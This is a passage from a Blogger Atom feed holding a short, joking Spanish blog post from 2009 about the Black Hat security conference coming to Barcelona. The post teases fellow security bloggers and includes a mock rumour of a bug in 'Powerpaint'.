src='http://3.bp.blogspot.com/_-dOA210g16k/SeTNpvzWCII/AAAAAAAAABU/GzaeYJu-yws/s1600-R/index.php%3Faction%3Ddlattach%3Battach%3D6%3Btype%3Davatar'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6014016604825873236.post-2688600202345815120</id><published>2009-04-15T21:44:00.008+02:00</published><updated>2009-04-16T00:00:29.549+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='SBD'/><category scheme='http://www.blogger.com/atom/ns#' term='Blackhat'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>La BlackHat se viene a casa</title><content type='html'>&lt;a href="http://www.flickr.com/photos/30017677@N05/" target="_blank"&gt;&lt;img style="width: 218px; height: 122px;" class="push" src="http://www.blackhat.com/html/images/kaminsky2.jpg" title="kurtz presentation dc 2009" alt="kurtz presentation dc 2009" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Depresion. Esto fue lo que sintieron todos los participantes al saber que no podrian disfrutar de los magnificos &lt;a href="http://www.20minutos.es/noticia/25442/1/"&gt;bares&lt;/a&gt; de &lt;span style="font-style: italic;"&gt;Holanda&lt;/span&gt;.&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Asi que a casa.. mas concretamente a Barcelona.. No esta mal, los &lt;strike&gt;robalectores&lt;/strike&gt; amgidos de &lt;a href="http://www.securitybydefault.com/"&gt;SBD&lt;/a&gt; van a cubrir la entrevista, como ellos son &lt;strike&gt;ricos gracias a el Conficker&lt;/strike&gt; trabajadores que ganan su sueldo honradamente, se lo pueden permitir, mientras yo &lt;strike&gt;intento crackearles&lt;/strike&gt; leo su &lt;b style="color: rgb(0, 0, 153);"&gt;Twitter&lt;/b&gt;.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Suenan rumores de un gran bug que puede deestabilizar el mundo.. todos sabemos que estan hablando de una vulnerabilidad en &lt;b style="color: rgb(255, 102, 0);"&gt;Powerpaint&lt;/b&gt;, no deberian ocultarlo.&lt;br /&gt;&lt;br /&gt;Sin otra mas, se despide hasta la proxima &lt;span style="font-weight: bold;"&gt;Jubjub&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6014016604825873236-2688600202345815120?l=jugandoconfosforos.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://jugandoconfosforos.blogspot.com/feeds/2688600202345815120/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/04/la-blackhat-se-viene-casa.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/2688600202345815120'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6014016604825873236/posts/default/2688600202345815120'/><link rel='alternate' type='text/html' href='http://jugandoconfosforos.blogspot.com/2009/04/la-blackhat-se-viene-casa.html' title='La BlackHat se viene a casa'/><author><name>Jubjub</name><uri>http://www.blogger.com/profile/07059259636381672567</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='28' src='http://3.bp.blogspot.com/_-dOA210g16k/SeTNpvzWCII/AAAAAAAAABU/GzaeYJu-yws/s1600-R/index.php%3Faction%3Ddlattach%3Battach%3D6%3Btype%3Davatar'/></author><thr:total>0</thr:total></entry></feed>
